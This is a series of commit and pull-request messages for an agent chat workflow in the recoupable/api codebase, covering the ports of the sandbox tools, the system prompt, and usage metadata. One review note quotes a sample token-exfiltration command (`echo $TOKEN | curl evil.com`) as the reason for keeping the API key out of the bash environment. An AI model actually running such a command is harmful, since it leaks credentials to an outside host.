so sandbox.recoupable.com's model/cost badges keep working when cut
over to /api/chat/workflow.

New (SRP, one function per file):
- lib/agent/messageMetadata/extractGatewayCost.ts — port of
  open-agents' gateway-metadata.ts, parses gateway-reported per-step
  cost from providerMetadata.
- lib/agent/messageMetadata/addLanguageModelUsage.ts — port of
  open-agents' usage.ts, pointwise-sums LanguageModelUsage records.
- lib/agent/messageMetadata/AgentMessageMetadata.ts — type mirroring
  open-agents' WebAgentMessageMetadata.
- lib/agent/messageMetadata/buildMessageMetadataCallback.ts —
  stateful factory returning a fresh callback per turn; accumulates
  usage + cost across finish-step parts.
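
A reduced sketch of the pointwise sum and the per-turn accumulator described above. `UsageSketch` keeps only three token fields and ignores cost; the real `LanguageModelUsage` type has more fields, and the names ending in `Sketch` are illustrative.

```typescript
// Reduced stand-in for the SDK usage record (assumption: three fields only).
interface UsageSketch {
  inputTokens: number | undefined;
  outputTokens: number | undefined;
  totalTokens: number | undefined;
}

// Sum two optional counts; stays undefined only when both sides are undefined.
function addTokenCountsSketch(a: number | undefined, b: number | undefined): number | undefined {
  if (a === undefined && b === undefined) return undefined;
  return (a ?? 0) + (b ?? 0);
}

function addUsageSketch(a: UsageSketch, b: UsageSketch): UsageSketch {
  return {
    inputTokens: addTokenCountsSketch(a.inputTokens, b.inputTokens),
    outputTokens: addTokenCountsSketch(a.outputTokens, b.outputTokens),
    totalTokens: addTokenCountsSketch(a.totalTokens, b.totalTokens),
  };
}

// Stateful factory: call once per assistant turn, then once per finish-step part.
function createUsageAccumulatorSketch() {
  let total: UsageSketch | undefined;
  return (stepUsage: UsageSketch) => {
    total = total === undefined ? stepUsage : addUsageSketch(total, stepUsage);
    return { lastStepUsage: stepUsage, totalMessageUsage: total };
  };
}
```

Creating a fresh accumulator per turn keeps totals from one assistant message out of the next.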

Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called
this out as a known gap from the original workflow port (PR 4).

Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage

Address PR review feedback (one exported function per file) and adopt
the user's preferred path of upgrading api's `ai` package rather than
maintaining a normalization shim:

- Extract addTokenCounts.ts (used by addLanguageModelUsage)
- Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by
  extractGatewayCost)
- Split AgentStepFinishMetadata into its own file (was co-located
  in AgentMessageMetadata)

Upgrade the AI SDK so the wire format matches open-agents natively:
- ai: 6.0.0-beta.122 → ^6.0.190
- @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai,
  @ai-sdk/mcp: all bumped to latest stable

The new SDK's LanguageModelUsage is the flat shape (top-level
`inputTokens` number + nested `inputTokenDetails`) — identical to
open-agents' wire format. No conversion needed, so:
- Delete normalizeUsage.ts + test (net -82 LOC)
- Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage
  directly)

Production code changes for the SDK upgrade:
- runAgentStep + setupChatRequest: await convertToModelMessages
  (now returns Promise<ModelMessage[]>)

Tests: 3106/3106 pass; production typecheck clean; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(task-tool): live subagent progress + transcript (Cutover Bundle B) (#594)

Convert taskTool.execute from `async () =>` to `async function*`,
mirroring open-agents' `packages/agent/tools/task.ts`. Yields multiple
chunks during the subagent run so the chat UI can render:

  - An initial "Subagent · 0 tools · 0 tokens" card with stable
    startedAt timestamp
  - A live `pending: {name, input}` indicator for each tool-call
  - Accumulated `usage` after each finish-step
  - A final `{final: ModelMessage[], ...}` chunk containing the full
    subagent transcript for expandable rendering

`toModelOutput` mirrors open-agents' implementation: extracts the
last assistant text part from `output.final` for inclusion in the
parent agent's context.
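
The generator shape can be sketched without the AI SDK. Everything below is an assumption made for illustration: the event union, the chunk fields beyond those named above, and the transcript entries (the real final chunk carries `ModelMessage[]`).

```typescript
type SubagentEvent =
  | { type: "tool-call"; name: string; input: unknown }
  | { type: "text"; text: string }
  | { type: "finish-step"; tokens: number };

interface TranscriptEntry {
  kind: "tool-call" | "assistant-text";
  text: string;
}

interface TaskChunk {
  startedAt: number;
  toolCallCount: number;
  tokens: number;
  pending?: { name: string; input: unknown };
  final?: TranscriptEntry[];
}

async function* runSubagentSketch(
  events: Iterable<SubagentEvent> | AsyncIterable<SubagentEvent>,
  startedAt: number,
): AsyncGenerator<TaskChunk> {
  let toolCallCount = 0;
  let tokens = 0;
  const transcript: TranscriptEntry[] = [];
  // Initial card: zero tools, zero tokens, stable start time.
  yield { startedAt, toolCallCount, tokens };
  for await (const event of events) {
    if (event.type === "tool-call") {
      toolCallCount += 1;
      transcript.push({ kind: "tool-call", text: event.name });
      yield { startedAt, toolCallCount, tokens, pending: { name: event.name, input: event.input } };
    } else if (event.type === "text") {
      transcript.push({ kind: "assistant-text", text: event.text });
    } else {
      tokens += event.tokens;
      yield { startedAt, toolCallCount, tokens };
    }
  }
  // Final chunk carries the whole transcript for expandable rendering.
  yield { startedAt, toolCallCount, tokens, final: transcript };
}

// What the parent model would see: only the last assistant text.
function lastAssistantTextSketch(final: TranscriptEntry[]): string | undefined {
  for (let i = final.length - 1; i >= 0; i -= 1) {
    const entry = final[i];
    if (entry !== undefined && entry.kind === "assistant-text") return entry.text;
  }
  return undefined;
}
```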

New (SRP, one function per file):
- lib/agent/messageMetadata/sumLanguageModelUsage.ts — wraps
  addLanguageModelUsage to handle undefined inputs without
  introducing zero-tokens placeholders.

Drive-by fix: askUserQuestionTool's `toModelOutput` signature was
`(output) =>` from the older beta SDK era. The current SDK
(ai@^6.0.190) passes `({ toolCallId, input, output })`. Updated to
`({ output }) =>` so the function actually receives the user's
answers at runtime — was previously falling through to the generic
"User responded to questions." path. Tests updated to match.

Tests: 25 new/updated (12 taskTool + 4 sumLanguageModelUsage + 9
askUserQuestion); full suite 3114/3114 pass; lint clean.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): thread real cwd + currentBranch into system prompt (cutover Bundle A.7) (#597)

* feat(chat-workflow): thread real cwd + currentBranch into system prompt (Bundle A.7)

Third open-agents → api cutover bundle. The handler hardcoded
`workingDirectory: DEFAULT_WORKING_DIRECTORY` and never set
`currentBranch`, so the agent had no environment info in its system
prompt and had to run `pwd` / `git branch` on every turn.

Production verification (today, before this fix):
  agent: "My system prompt does not contain working directory or
         branch information."

After this fix the agent receives an Environment section + Current
branch line + cloud-sandbox checkpointing block — same shape as
open-agents (sandbox.recoupable.com) emits.

Changes:
- New `lib/chat/buildAgentSystemPrompt.ts` (SRP) — assembles
  environment section → Current branch → cloud-sandbox checkpointing
  → custom instructions, all conditional on inputs. Mirrors
  open-agents' `buildSystemPrompt` (packages/agent/system-prompt.ts).
- New `lib/chat/cloudSandboxInstructions.ts` (SRP) — ports
  open-agents' `CLOUD_SANDBOX_INSTRUCTIONS` block with `{branch}`
  placeholder substitution.
- `handleChatWorkflowStream`: connect the sandbox once for both skill
  discovery AND cwd/branch reading, then thread real values into
  `AgentContext.sandbox.workingDirectory` + `.currentBranch`. On
  connect failure, fall back to DEFAULT_WORKING_DIRECTORY (preserves
  today's behavior; tools surface real errors later when they
  reconnect).
- `runAgentStep`: build the system prompt via
  `buildAgentSystemPrompt({cwd, currentBranch, customInstructions})`
  instead of using the static `agentCustomInstructions` directly.
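
A minimal sketch of a prompt builder whose sections are all conditional on inputs, in the order listed above. The section wording and the checkpointing template text are placeholders invented for this example; only the ordering and the `{branch}` substitution come from the commit text.

```typescript
interface SystemPromptOptionsSketch {
  cwd?: string;
  currentBranch?: string;
  customInstructions?: string;
}

// Placeholder text (hypothetical); the real block is ported from open-agents.
const CHECKPOINT_TEMPLATE_SKETCH = "Checkpoint your work on branch {branch}.";

function buildAgentSystemPromptSketch(options: SystemPromptOptionsSketch): string {
  const sections: string[] = [];
  if (options.cwd) {
    sections.push(`# Environment\nWorking directory: ${options.cwd}`);
  }
  if (options.currentBranch) {
    sections.push(`Current branch: ${options.currentBranch}`);
    // split/join replaces every occurrence and avoids `$` replacement patterns.
    sections.push(CHECKPOINT_TEMPLATE_SKETCH.split("{branch}").join(options.currentBranch));
  }
  if (options.customInstructions) {
    sections.push(options.customInstructions);
  }
  return sections.join("\n\n");
}
```

With no cwd and no branch the output collapses to the custom instructions alone, which mirrors the behavior before this change.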

Scope reduced from the original "A.7+9" bundle: dropped contextLimit
plumbing because it's a client-side display concern in open-agents,
not server-side model routing (verified via grep — open-agents'
server never reads context.contextLimit either).

Tests: 7 new (6 buildAgentSystemPrompt + 1 runAgentStep wiring);
full suite 3121/3121 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore(chat-workflow): drop currentBranch handling from system prompt

Per direction: branch is always `main` (the default branch) in api's
deployment topology, so the per-branch `Current branch: <name>` line
and cloud-sandbox checkpointing block don't add information today.
Strip the templating to keep the system prompt focused on what's
load-bearing (the Environment section indicating workspace-relative
paths).

- Delete `lib/chat/cloudSandboxInstructions.ts` (was a port of
  open-agents' CLOUD_SANDBOX_INSTRUCTIONS, only useful with a real
  per-session branch)
- Drop `currentBranch` from `buildAgentSystemPrompt` options +
  rendering
- Stop reading `sandbox.currentBranch` in handleChatWorkflowStream
  (the field stays on AgentContext.sandbox for type completeness;
  also consumed by createSandboxHandler unchanged)
- Remove branch-related test cases

Can be re-added later if/when meaningful per-session branches (e.g.
xx/abcdef12 generated branches) land.

Tests: 3119/3119 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): drop stale currentBranch arg from buildAgentSystemPrompt call

Build failure on bf1e245 — runAgentStep was still passing
`currentBranch: input.agentContext.sandbox.currentBranch` after
buildAgentSystemPrompt's option was removed. Stripping it.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
sweetmantech added a commit to recoupable/api that referenced this pull request May 22, 2026
* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581)

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream from PR #579 with a real Vercel Workflow
agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones
(`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired —
the workflow runs streamText with the gateway model + Recoup custom
instructions only. Sandbox tool surface comes in a follow-up PR.

What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile
  existing active_stream_id (resume / 409 / fall-through) → refresh
  lifecycle activity → fire-and-forget persist user message → start
  runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) →
  return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop
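
The `org-<slug>-<uuid>` → uuid mapping can be sketched with a single regular expression. Returning `null` when nothing matches and accepting a full clone URL as input are assumptions; the commit only states the pattern and the lowercasing.

```typescript
// Matches "org-<slug>-<uuid>" anywhere in the input and captures the UUID.
const ORG_UUID_PATTERN =
  /org-.+-([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})(?![0-9a-f])/i;

function extractOrgIdSketch(input: string): string | null {
  const uuid = ORG_UUID_PATTERN.exec(input)?.[1];
  // Lowercase so later comparisons against stored ids are case-insensitive.
  return uuid ? uuid.toLowerCase() : null;
}
```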

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 CAS + 3 touchChat + 2 updateChat + 3
createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest +
6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored).
Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools).
Without tools, `finishReason` is always "stop" after one turn — the
runAgentWorkflow loop shape is in place but only iterates once today.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts →
  app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate
    on active_stream_id. Subsumes compareAndSetChatActiveStreamId and
    touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces
    domain-specific isFirstChatMessage. The "is earliest?" check now
    lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a
    discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so
    callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts`
  (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a
  `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the
  race where two requests could both bill the model before one lost the
  CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}`
  so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer
  clears stale active_stream_id on transient workflow API failures —
  we treat any uncertainty as conflict. Failed CAS-clear on a completed
  run also returns conflict (rather than possibly falling through to
  ready on a DB read error).
- await getRun(runId).cancel() in handler — previously synchronous +
  unawaited cancellation could escape the try/catch.
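
The claim-before-start ordering from the P1 fixes, sketched against an in-memory store. The store class, the synchronous calls, and the status mapping are simplifications for illustration; the real handler talks to Supabase asynchronously and cancels the started run when promotion fails.

```typescript
// Result shape follows the commit text; the store is a stand-in for Supabase.
type CasResult = { ok: true; claimed: boolean } | { ok: false; error: string };

class InMemoryChatStore {
  private readonly activeStreamIds = new Map<string, string | null>();

  constructor(chatIds: string[]) {
    for (const id of chatIds) this.activeStreamIds.set(id, null);
  }

  // Set active_stream_id to `next` only if it currently equals `expected`.
  compareAndSet(chatId: string, expected: string | null, next: string | null): CasResult {
    if (!this.activeStreamIds.has(chatId)) return { ok: false, error: "chat not found" };
    if (this.activeStreamIds.get(chatId) !== expected) return { ok: true, claimed: false };
    this.activeStreamIds.set(chatId, next);
    return { ok: true, claimed: true };
  }
}

type ClaimOutcome = { status: 200; runId: string } | { status: 409 } | { status: 500 };

function claimThenStartSketch(
  store: InMemoryChatStore,
  chatId: string,
  placeholderSuffix: string,
  startWorkflow: () => string,
): ClaimOutcome {
  const placeholder = `pending-${placeholderSuffix}`;
  // 1. Claim the slot BEFORE starting anything billable.
  const claim = store.compareAndSet(chatId, null, placeholder);
  if ("error" in claim) return { status: 500 };
  if (!claim.claimed) return { status: 409 };
  // 2. Only the winner starts the workflow.
  const runId = startWorkflow();
  // 3. Promote the placeholder to the real run id.
  const promote = store.compareAndSet(chatId, placeholder, runId);
  if ("error" in promote) return { status: 500 };
  if (!promote.claimed) return { status: 409 };
  return { status: 200, runId };
}
```

The losing request returns before `startWorkflow` runs, which is the point of the fix: no second model call is made for a race that is already lost.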

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes
  id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH
  exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to
  body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer
  acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading
  lands with tool ports (PR 4). Multi-turn loop with the same input was
  unsafe — log+warn if model returns tool-calls and exit.
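
The title-truncation fix in the P2 list can be sketched as below. The value 80 for `TITLE_MAX_LENGTH` is inferred from the earlier "title-from-first-80" note and is an assumption, as is the function name.

```typescript
const TITLE_MAX_LENGTH = 80; // assumed value, see lead-in
const TITLE_SUFFIX = "…"; // one character, unlike the three-character "..."

function truncateTitleSketch(text: string, max: number = TITLE_MAX_LENGTH): string {
  if (text.length <= max) return text;
  // Reserve room for the suffix so the result is exactly `max` characters long.
  const bodyBudget = max - TITLE_SUFFIX.length;
  return text.slice(0, bodyBudget) + TITLE_SUFFIX;
}
```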

Tests reworked: 231 in the touched files all green; full suite 2949/2949;
lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was
a carry-over from open-agents — handleChatWorkflowStream.ts already
top-level imports `start` and `getRun` from the same package, so there's
no reason for the lib to defer. Moving to a normal top-level import for
consistency.

Also tightens the cancel-throws handler test to use the same deferred-
rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's
unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific
predicate logic doesn't belong in the Supabase plumbing. Restructured:

- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts
  `where: Partial<Tables<"chats">>` (a generic predicate that maps to
  `column = value` or `column IS NULL`) so no column name is hardcoded
  in the Supabase lib.

- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper.
  Owns the "compare-and-set on active_stream_id" concept and returns a
  discriminated `{ok, claimed} | {ok: false, error}` result. Handler
  and reconcileExistingActiveStream both compose against this wrapper
  instead of constructing predicates inline.

- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test +
tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's
errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }`
   narrowing wasn't kicking in under Next.js's strict TS plugin.
   Switched to `if ("error" in result)` (in-operator narrowing) which
   reliably discriminates the union members regardless of literal-type
   inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...)
   .update(...).eq(...)` + reassignment in a `for` loop (`.is()` /
   `.eq()` per where entry) caused "type instantiation is excessively
   deep" — Supabase's PostgrestFilterBuilder is heavily generic and the
   reassignment kept expanding the type. Rewrote as: split where map
   into equality matches (one `.match(obj)` call) + nullable columns
   (reduced with `.is(col, null)` typed back to the original builder).
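
The partition step of the second fix can be sketched on its own, without the Supabase client. The helper name and the value types are illustrative; in the real code the `equals` object would go to one `.match(obj)` call and each null column to `.is(col, null)`.

```typescript
type WhereValue = string | number | boolean | null;

interface SplitWhereSketch {
  equals: Record<string, string | number | boolean>;
  nullColumns: string[];
}

// Split a where-map into `column = value` matches and `column IS NULL` checks.
function splitWhereSketch(where: Record<string, WhereValue>): SplitWhereSketch {
  const equals: Record<string, string | number | boolean> = {};
  const nullColumns: string[] = [];
  for (const [column, value] of Object.entries(where)) {
    if (value === null) {
      nullColumns.push(column);
    } else {
      equals[column] = value;
    }
  }
  return { equals, nullColumns };
}
```

Computing both groups up front means the query builder is chained a fixed number of times instead of being reassigned inside a loop.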

Both fixes are behavior-neutral: the function shape and contract are
unchanged. 37/37 tests in touched files green; full suite 2955/2955;
lint clean; `pnpm build` now succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583)

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it
through the workflow via streamText's `experimental_context`. Proves
the entire tool-execution machinery works end-to-end. The remaining 10
tools (read, write, grep, glob, todo, task, ask_user_question, skill,
fetch + utils) port in a follow-up; this PR's scope was deliberately
held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard,
  getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN,
  RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts
  adapted to api's Sandbox interface. Injects recoup env on foreground
  execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool
  record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as
  experimental_context, and uses streamText's internal multi-step loop
  (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop
  in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url
  via extractOrgId, builds AgentContext with session.sandbox_state +
  validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory
+ 3 workflow file updates picked up by existing tests). Full suite
2978/2978 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's
  default stop condition handles tool-call iteration without an
  arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from
  bashTool. All model-issued commands are trusted in this PR — host-
  side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1
  about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler +
  buildRecoupExecEnv. Handing the long-lived api key to bash would let
  any model-issued command exfiltrate it via env (`echo $TOKEN | curl
  evil.com`). Slim PR 4 has no actual consumer for the token — only
  the future `skill` tool needs it. Proper short-lived token minting
  will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate
  sandbox.state is a non-null object AND sandbox.workingDirectory is a
  non-empty string. Earlier guard returned true for `{ sandbox: {} }`,
  letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's
  deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo
  has no enforced max-lines rule; existing tests routinely exceed 700
  lines.
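
The tightened `isAgentContext` guard from the P2 item above can be sketched as follows. The interface is a reduced assumption holding only the two fields the commit says are validated.

```typescript
// Reduced shape: only the fields the commit says the guard checks.
interface AgentContextShapeSketch {
  sandbox: { state: object; workingDirectory: string };
}

function isAgentContextSketch(value: unknown): value is AgentContextShapeSketch {
  if (typeof value !== "object" || value === null) return false;
  const sandbox = (value as { sandbox?: unknown }).sandbox;
  if (typeof sandbox !== "object" || sandbox === null) return false;
  const { state, workingDirectory } = sandbox as {
    state?: unknown;
    workingDirectory?: unknown;
  };
  // state must be a non-null object, workingDirectory a non-empty string.
  return (
    typeof state === "object" &&
    state !== null &&
    typeof workingDirectory === "string" &&
    workingDirectory.length > 0
  );
}
```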

Tests updated for the new shape. 25 tests in touched files green
(8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv +
2 factory). Full suite 2980/2980 pass; lint clean; production build
succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so
the workflow agent gets the model wrap-up turn after a tool call (model
→ tool → tool-result → model → text response), instead of stopping at
streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:

- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts.
  Inherits the value that /api/chat already uses (originally hardcoded
  in getGeneralAgent.ts:55) — high enough that normal flows never hit
  the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant
  instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to
  streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent,
createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`
— they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585)

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools
from open-agents/packages/agent/tools/. Each is a direct port adapted
to api's Sandbox interface, registered in buildAgentTools, and ready
for the agent to invoke through the existing experimental_context
plumbing.

New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB
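
For the readFileTool entry, 1-indexed offset/limit with numbered output can be sketched as below. The `N: line` format and the function name are assumptions; the commit does not show the real output layout.

```typescript
// offset is 1-indexed; limit caps how many lines are returned.
function formatNumberedLinesSketch(
  content: string,
  offset: number = 1,
  limit: number = Number.POSITIVE_INFINITY,
): string {
  const lines = content.split("\n");
  const start = Math.max(1, Math.floor(offset));
  const selected = lines.slice(start - 1, start - 1 + limit);
  // Line numbers reflect the position in the file, not in the slice.
  return selected.map((line, index) => `${start + index}: ${line}`).join("\n");
}
```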

New helpers (utilities used by multiple tools):
- shellEscape.ts — `'` → `'\''` dance
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path
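
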